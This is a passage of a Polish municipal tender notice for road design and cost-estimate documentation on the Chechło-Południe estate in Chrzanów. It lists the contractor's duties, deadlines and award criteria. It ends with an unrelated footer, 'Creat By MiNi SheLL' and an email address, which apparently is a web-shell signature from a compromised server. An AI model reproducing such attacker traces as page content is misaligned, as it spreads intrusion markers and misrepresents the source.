3) opracowanie projektu budowlanego (5 egz.), zgodnie z Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. (Dz. U. z 2012 poz. 462 z późn. zm.), Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 2016 poz. 124), ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2016 poz. 290).
4) opracowanie projektów wykonawczych dla niezbędnych branż wraz z projektem docelowej organizacji ruchu (4 egz.),
5) opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych (4 egz.), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. z 2013 poz. 1129 z późn. zm.),
6) opracowanie kosztorysu inwestorskiego i przedmiaru robót (2 egz.), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 poz. 1129 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego; obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 nr 130 poz. 1389 z późn. zm.)
7) uzyskanie w imieniu Zamawiającego ostatecznej decyzji o zezwoleniu na realizację inwestycji drogowej (2 egz. wraz z załącznikami), zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2015 poz. 2031).
Zamawiający winien również otrzymać opracowania wymienione w pkt. 1-6 w wersji elektronicznej na płycie CD.
Wykonawca winien uwzględnić przy opracowaniu przedmiotu zamówienia: 
- załącznik nr 2a - załącznik graficzny z lokalizacją przedsięwzięcia wraz z liniami określającymi teren możliwy do zagospodarowania
- załącznik nr 2b - wyciąg z Miejscowego Planu Zagospodarowania Przestrzennego 
- załącznik nr 2c - plansza (koncepcja) z lokalizacją miejsc postojowych przy ul. Zielonej - opracowanie ma charakter poglądowy.
Wykonawca przed wystąpieniem o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej uzyska pozytywną opinię Zamawiającego dla rozwiązań projektowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Budowa dróg na os. Chechło - Południe w Chrzanowie - ul. Leszczynowa, ul. Brzoskwiniowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres opracowania :
a) ul. Leszczynowa:
- budowa ulicy Leszczynowej (droga gminna klasy L) od włączenia do ul. Wschodniej do skrzyżowania z ul. Wrzosową na długości ok. 280 m (lokalizacja na zał. graficznym);
- jezdnia 2 pasy ruchu po 2,5 m razem 5,0 m;
- konstrukcja nawierzchni dla kategorii obciążenia ruchem KR-2;
- obustronne pobocze utwardzane;
- obustronne okrawężnikowanie;
- wjazdy do posesji z kostki betonowej; 
- odwodnienie (kanalizacja ogólnospławna);
- budowa sieci gazowej;
- budowa sieci wodociągowej
- budowa oświetlenia
b) ul. Brzoskwiniowa:
- budowa ulicy Brzoskwiniowej (droga gminna klasy L) od włączenia do ul. Wschodniej do skrzyżowania z ul. Wrzosową na długości ok. 235 m (lokalizacja na zał. graficznym); 
- jezdnia 2 pasy ruchu po 2,5 m razem 5,0 m;
- konstrukcja nawierzchni dla kategorii obciążenia ruchem KR-2;
- obustronne pobocze utwardzane;
- obustronne okrawężnikowanie;
- wjazdy do posesji z kostki betonowej; 
- odwodnienie (kanalizacja ogólnospławna);
- budowa sieci gazowej;
- budowa sieci wodociągowej;
- budowa oświetlenia;
Obowiązki Wykonawcy:
1) opracowanie mapy do celów projektowych, zgodnie z ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2015 poz. 520),
2) uzyskanie wypisów i wyrysów z ewidencji gruntów,
3) przygotowanie geotechnicznych warunków posadawiania opracowanych zgodnie z Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych z dnia 25 kwietnia 2012 r. (Dz. U. z 2012 poz. 463).
4) opracowanie projektu budowlanego (5 egz.), zgodnie z Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. (Dz. U. z 2012 poz. 462 z późn. zm.), Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 2016 poz. 124), ustawą z dnia 7 lipca 1994 r. Prawo Budowlane ( Dz. U. z 2016 poz. 290),
5) opracowanie projektów wykonawczych dla niezbędnych branż wraz z projektem docelowej organizacji ruchu (4 egz.),
6) opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych (4 egz.), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. z 2013 poz. 1129 z późn. zm.),
7) opracowanie kosztorysu inwestorskiego i przedmiaru robót (2 egz.), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 poz. 1129 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego; obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 nr 130 poz. 1389 z późn. zm.)
8) uzyskanie w imieniu Zamawiającego ostatecznej decyzji o pozwoleniu na budowę, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2016 poz. 290).
Zamawiający winien również otrzymać opracowania wymienione w pkt. 1, 3-7 w wersji elektronicznej na płycie CD.
Wykonawca winien uwzględnić przy opracowaniu przedmiotu zamówienia: 
- załącznik nr 3a - wyciąg z Miejscowego Planu Zagospodarowania Przestrzennego
- załącznik nr 3b - załącznik graficzny z lokalizacją inwestycji
Wykonawca przed wystąpieniem o wydanie decyzji o pozwoleniu na budowę uzyska pozytywną opinię Zamawiającego dla rozwiązań projektowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com